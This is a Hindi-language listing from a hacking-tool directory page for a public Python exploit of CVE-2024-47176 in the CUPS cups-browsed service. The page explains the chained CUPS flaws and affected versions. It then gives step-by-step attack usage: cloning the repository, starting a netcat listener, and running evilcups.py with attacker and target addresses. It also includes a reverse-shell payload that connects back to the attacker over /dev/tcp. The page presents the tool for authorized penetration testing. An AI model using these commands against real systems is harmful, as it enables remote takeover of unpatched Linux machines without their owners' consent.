Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-47176 — CVE-2024-47176 के लिए Python एक्सप्लॉइट जो CUPS cups-browsed में क्राफ्टेड UDP पैकेट्स के माध्यम से रिमोट कमांड निष्पादन प्राप्त करता है। अधिकृत पेनिट्रेशन टेस्टिंग के लिए रिवर्स शेल पेलोड डिलीवरी शामिल है। | Kitploit
उपकरण/GitHubGitHub/gumerzzzindo/cve-2024-47176
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

CVE-2024-47176 के लिए Python एक्सप्लॉइट जो CUPS cups-browsed में क्राफ्टेड UDP पैकेट्स के माध्यम से रिमोट कमांड निष्पादन प्राप्त करता है। अधिकृत पेनिट्रेशन टेस्टिंग के लिए रिवर्स शेल पेलोड डिलीवरी शामिल है।

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-47176 — CUPS में दूरस्थ कमांड निष्पादन

CVE CVSS Python Platform License

केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए।


विषय सूची

  • विवरण
  • प्रभावित सिस्टम
  • संबंधित CVE
  • पूर्वापेक्षाएँ
  • सेटअप
  • उपयोग
  • अस्वीकरण

विवरण

CUPS (Common UNIX Printing System) एक ओपन-सोर्स प्रिंटिंग सिस्टम है जो नेटवर्क प्रिंटर को प्रबंधित करता है। CVE-2024-47176 डेमॉन को लक्षित करता है, जो पर बाइंड होता है और किसी भी स्रोत से पैकेट पर आंख मूंदकर भरोसा करता है।

cups-browsed
INADDR_ANY:631

एक दुर्भावनापूर्ण UDP पैकेट बनाकर जो Get-Printer-Attributes IPP अनुरोध को ट्रिगर करता है, एक हमलावर cups-browsed को एक हमलावर-नियंत्रित सर्वर से कनेक्ट करने के लिए प्रेरित कर सकता है — और जब नीचे दी गई कमजोरियों के साथ संयुक्त किया जाता है, तो मनमाना दूरस्थ कमांड निष्पादन प्राप्त कर सकता है।


प्रभावित सिस्टम

घटकशर्त
cups-browsedUDP 631 पर सुन रहा है (डिफ़ॉल्ट)
CUPS < 2.4.11अप्रबंधित संस्करण
CUPS के साथ Linux सिस्टम उजागरपोर्ट 631 हमलावर से पहुँच योग्य

संबंधित CVE

CVEविवरण
CVE-2024-47176cups-browsed पोर्ट 631 पर किसी भी UDP पैकेट पर भरोसा करता है
CVE-2024-47076libcupsfilters IPP गुणों को साफ नहीं करता
CVE-2024-47175libppd असुरक्षित डेटा को PPD फ़ाइलों में इंजेक्ट करता है
CVE-2024-47177cups-filters PPD के माध्यम से कमांड निष्पादन की अनुमति देता है

पूर्वापेक्षाएँ

  • पोर्ट 631 (IPP/UDP) उजागर हुआ लक्ष्य मशीन
  • आपकी हमला मशीन पर Python 3.x
  • nmap (वैकल्पिक, टोही के लिए)
  • रिवर्स शेल के लिए एक नेटकैट श्रोता

सेटअप

1. रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. आवश्यक Python निर्भरता स्थापित करें:

root@kitploit:~
pip install ippserver

3. अपनी मशीन पर एक श्रोता शुरू करें:

root@kitploit:~
nc -lvnp <PORT>

उपयोग

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

उदाहरण — रिवर्स शेल:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

एक्सप्लॉइट चलाने के बाद, पेलोड को निष्पादित करने के लिए लक्ष्य पर एक प्रिंट जॉब ट्रिगर करें (या स्वचालित जाँच की प्रतीक्षा करें)।


अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा अनुसंधान के लिए है। इस उपकरण का उपयोग उन सिस्टम के खिलाफ करना जिनके मालिक नहीं हैं या जिनके लिए स्पष्ट लिखित अनुमति नहीं है, अवैध और अनैतिक है।

टूल डाउनलोड करें